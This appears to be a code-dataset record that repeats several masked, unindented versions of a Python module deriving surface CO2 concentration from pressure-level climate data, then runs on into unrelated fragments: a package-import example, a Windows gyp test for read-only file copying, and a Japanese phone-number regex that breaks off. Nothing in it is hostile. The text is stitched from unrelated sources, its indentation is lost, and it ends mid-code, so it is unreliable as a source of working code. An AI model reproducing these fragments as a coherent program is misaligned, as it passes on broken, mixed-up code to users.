co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_first_unmasked_data(array, axis):
"""Get first unmasked value of an array along an axis."""
mask = da.ma.getmaskarray(array)
numerical_mask = da.where(mask, -1.0, 1.0)
indices_first_positive = da.argmax(numerical_mask, axis=axis)
indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.
ndim) if i != axis], indexing='ij')
indices.insert(axis, indices_first_positive)
first_unmasked_data = np.array(array)[tuple(indices)]
return first_unmasked_data
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import dask.array as da
import iris
import numpy as np
import stratify
from ._baseclass import DerivedVariableBase
def _get_first_unmasked_data(array, axis):
"""Get first unmasked value of an array along an axis."""
mask = da.ma.getmaskarray(array)
numerical_mask = da.where(mask, -1.0, 1.0)
indices_first_positive = da.argmax(numerical_mask, axis=axis)
indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.
ndim) if i != axis], indexing='ij')
indices.insert(axis, indices_first_positive)
first_unmasked_data = np.array(array)[tuple(indices)]
return first_unmasked_data
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
"""Derivation of variable ``co2s``."""
import dask.array as da
import iris
import numpy as np
import stratify
from ._baseclass import DerivedVariableBase
def _get_first_unmasked_data(array, axis):
"""Get first unmasked value of an array along an axis."""
mask = da.ma.getmaskarray(array)
numerical_mask = da.where(mask, -1.0, 1.0)
indices_first_positive = da.argmax(numerical_mask, axis=axis)
indices = da.meshgrid(
*[da.arange(array.shape[i]) for i in range(array.ndim) if i != axis],
indexing='ij')
indices.insert(axis, indices_first_positive)
first_unmasked_data = np.array(array)[tuple(indices)]
return first_unmasked_data
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(
iris.Constraint(name='mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(
iris.Constraint(name='surface_air_pressure'))
# Fill masked data if necessary (interpolation fails with masked data)
(z_axis,) = co2_cube.coord_dims(co2_cube.coord(axis='Z',
dim_coords=True))
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(
co2_cube.core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data,
co2_cube.core_data())
# Interpolation (not supported for dask arrays)
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(
air_pressure_coord.points, co2_cube.shape,
co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(
target_levels,
original_levels,
co2_cube.data,
axis=z_axis,
interpolation='linear',
extrapolation='linear',
)
co2s_data = np.squeeze(co2s_data, axis=z_axis)
# Construct co2s cube
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data,
var_name='plev',
standard_name='air_pressure',
long_name='pressure',
units=ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
|
flexible
|
{
"blob_id": "7c9b68b2d32d8e435f332d4412ea1ba899607ec4",
"index": 9395,
"step-1": "<mask token>\n\n\nclass DerivedVariable(DerivedVariableBase):\n <mask token>\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-2": "<mask token>\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = 
np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-3": "<mask token>\n\n\ndef _get_first_unmasked_data(array, axis):\n \"\"\"Get first unmasked value of an array along an axis.\"\"\"\n mask = da.ma.getmaskarray(array)\n numerical_mask = da.where(mask, -1.0, 1.0)\n indices_first_positive = da.argmax(numerical_mask, axis=axis)\n indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.\n ndim) if i != axis], indexing='ij')\n indices.insert(axis, indices_first_positive)\n first_unmasked_data = np.array(array)[tuple(indices)]\n return first_unmasked_data\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. 
with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-4": "<mask token>\nimport dask.array as da\nimport iris\nimport numpy as np\nimport stratify\nfrom ._baseclass import DerivedVariableBase\n\n\ndef _get_first_unmasked_data(array, axis):\n \"\"\"Get first unmasked value of an array along an axis.\"\"\"\n mask = da.ma.getmaskarray(array)\n numerical_mask = da.where(mask, -1.0, 1.0)\n indices_first_positive = da.argmax(numerical_mask, axis=axis)\n indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.\n ndim) if i != axis], indexing='ij')\n indices.insert(axis, indices_first_positive)\n first_unmasked_data = np.array(array)[tuple(indices)]\n return first_unmasked_data\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. 
with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-5": "\"\"\"Derivation of variable ``co2s``.\"\"\"\nimport dask.array as da\nimport iris\nimport numpy as np\nimport stratify\n\nfrom ._baseclass import DerivedVariableBase\n\n\ndef _get_first_unmasked_data(array, axis):\n \"\"\"Get first unmasked value of an array along an axis.\"\"\"\n mask = da.ma.getmaskarray(array)\n numerical_mask = da.where(mask, -1.0, 1.0)\n indices_first_positive = da.argmax(numerical_mask, axis=axis)\n indices = da.meshgrid(\n *[da.arange(array.shape[i]) for i in range(array.ndim) if i != axis],\n indexing='ij')\n indices.insert(axis, indices_first_positive)\n first_unmasked_data = np.array(array)[tuple(indices)]\n return first_unmasked_data\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. 
with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(\n iris.Constraint(name='mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(\n iris.Constraint(name='surface_air_pressure'))\n\n # Fill masked data if necessary (interpolation fails with masked data)\n (z_axis,) = co2_cube.coord_dims(co2_cube.coord(axis='Z',\n dim_coords=True))\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(\n co2_cube.core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data,\n co2_cube.core_data())\n\n # Interpolation (not supported for dask arrays)\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(\n air_pressure_coord.points, co2_cube.shape,\n co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(\n target_levels,\n original_levels,\n co2_cube.data,\n axis=z_axis,\n interpolation='linear',\n extrapolation='linear',\n )\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n\n # Construct co2s cube\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data,\n var_name='plev',\n standard_name='air_pressure',\n long_name='pressure',\n units=ps_cube.units)\n 
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# PROBLEM: Code organized in package and want to import a submodule from one o the other pkg
# submodules without hardcoding the package name into the import statement
# SOLUTION: Use pkg-relative import
# Absolete path
from mypackage.A import grok
print(dir(grok))
grok.testA()
|
normal
|
{
"blob_id": "ad9facb9c8e552845df9171549f886f3e9cba193",
"index": 7544,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(dir(grok))\ngrok.testA()\n",
"step-3": "from mypackage.A import grok\nprint(dir(grok))\ngrok.testA()\n",
"step-4": "# PROBLEM: Code organized in package and want to import a submodule from one o the other pkg\n# submodules without hardcoding the package name into the import statement\n# SOLUTION: Use pkg-relative import\n\n# Absolete path\nfrom mypackage.A import grok\n\nprint(dir(grok))\ngrok.testA()",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
os.makedirs('subdir')
read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']
for f in read_only_files:
test.write(f, 'source_contents')
test.chmod(f, stat.S_IREAD)
if os.access(f, os.W_OK):
test.fail_test()
os.makedirs(test.built_file_path('dest/subdir'))
for f in read_only_files:
f = os.path.join('dest', f)
test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')
test.chmod(test.built_file_path(f), stat.S_IREAD)
if os.access(test.built_file_path(f), os.W_OK):
test.fail_test()
test.run_gyp('copies_readonly_files.gyp')
test.build('copies_readonly_files.gyp')
for f in read_only_files:
f = os.path.join('dest', f)
test.must_contain(test.built_file_path(f), 'source_contents')
for f in read_only_files:
if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):
test.fail_test()
test.pass_test()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import TestGyp
import filecmp
import os
import stat
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
os.makedirs('subdir')
read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']
for f in read_only_files:
test.write(f, 'source_contents')
test.chmod(f, stat.S_IREAD)
if os.access(f, os.W_OK):
test.fail_test()
os.makedirs(test.built_file_path('dest/subdir'))
for f in read_only_files:
f = os.path.join('dest', f)
test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')
test.chmod(test.built_file_path(f), stat.S_IREAD)
if os.access(test.built_file_path(f), os.W_OK):
test.fail_test()
test.run_gyp('copies_readonly_files.gyp')
test.build('copies_readonly_files.gyp')
for f in read_only_files:
f = os.path.join('dest', f)
test.must_contain(test.built_file_path(f), 'source_contents')
for f in read_only_files:
if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):
test.fail_test()
test.pass_test()
<|reserved_special_token_1|>
"""
Make sure overwriting read-only files works as expected (via win-tool).
"""
import TestGyp
import filecmp
import os
import stat
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
os.makedirs('subdir')
read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']
for f in read_only_files:
test.write(f, 'source_contents')
test.chmod(f, stat.S_IREAD)
if os.access(f, os.W_OK):
test.fail_test()
os.makedirs(test.built_file_path('dest/subdir'))
for f in read_only_files:
f = os.path.join('dest', f)
test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')
test.chmod(test.built_file_path(f), stat.S_IREAD)
if os.access(test.built_file_path(f), os.W_OK):
test.fail_test()
test.run_gyp('copies_readonly_files.gyp')
test.build('copies_readonly_files.gyp')
for f in read_only_files:
f = os.path.join('dest', f)
test.must_contain(test.built_file_path(f), 'source_contents')
for f in read_only_files:
if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):
test.fail_test()
test.pass_test()
|
flexible
|
{
"blob_id": "efe5921afb160b7b5a953cdd0c2f90f64b5f34c9",
"index": 5975,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif sys.platform == 'win32':\n test = TestGyp.TestGyp(formats=['ninja'])\n os.makedirs('subdir')\n read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']\n for f in read_only_files:\n test.write(f, 'source_contents')\n test.chmod(f, stat.S_IREAD)\n if os.access(f, os.W_OK):\n test.fail_test()\n os.makedirs(test.built_file_path('dest/subdir'))\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')\n test.chmod(test.built_file_path(f), stat.S_IREAD)\n if os.access(test.built_file_path(f), os.W_OK):\n test.fail_test()\n test.run_gyp('copies_readonly_files.gyp')\n test.build('copies_readonly_files.gyp')\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.must_contain(test.built_file_path(f), 'source_contents')\n for f in read_only_files:\n if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):\n test.fail_test()\n test.pass_test()\n",
"step-3": "<mask token>\nimport TestGyp\nimport filecmp\nimport os\nimport stat\nimport sys\nif sys.platform == 'win32':\n test = TestGyp.TestGyp(formats=['ninja'])\n os.makedirs('subdir')\n read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']\n for f in read_only_files:\n test.write(f, 'source_contents')\n test.chmod(f, stat.S_IREAD)\n if os.access(f, os.W_OK):\n test.fail_test()\n os.makedirs(test.built_file_path('dest/subdir'))\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')\n test.chmod(test.built_file_path(f), stat.S_IREAD)\n if os.access(test.built_file_path(f), os.W_OK):\n test.fail_test()\n test.run_gyp('copies_readonly_files.gyp')\n test.build('copies_readonly_files.gyp')\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.must_contain(test.built_file_path(f), 'source_contents')\n for f in read_only_files:\n if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):\n test.fail_test()\n test.pass_test()\n",
"step-4": "\n\n\n\n\n\n\"\"\"\nMake sure overwriting read-only files works as expected (via win-tool).\n\"\"\"\n\nimport TestGyp\n\nimport filecmp\nimport os\nimport stat\nimport sys\n\nif sys.platform == 'win32':\n test = TestGyp.TestGyp(formats=['ninja'])\n\n \n os.makedirs('subdir')\n read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']\n for f in read_only_files:\n test.write(f, 'source_contents')\n test.chmod(f, stat.S_IREAD)\n if os.access(f, os.W_OK):\n test.fail_test()\n\n \n \n \n os.makedirs(test.built_file_path('dest/subdir'))\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')\n test.chmod(test.built_file_path(f), stat.S_IREAD)\n \n if os.access(test.built_file_path(f), os.W_OK):\n test.fail_test()\n\n test.run_gyp('copies_readonly_files.gyp')\n test.build('copies_readonly_files.gyp')\n\n \n for f in read_only_files:\n f = os.path.join('dest', f)\n test.must_contain(test.built_file_path(f), 'source_contents')\n\n \n for f in read_only_files:\n if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):\n test.fail_test()\n\n test.pass_test()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import re
n = input("電話番号を入力してください>>")
pattern = r'[\(]{0,1}[0-9]{2,4}[\)\-\(]{0,1}[0-9]{2,4}[\)\-]{0,1}[0-9]{3,4}'
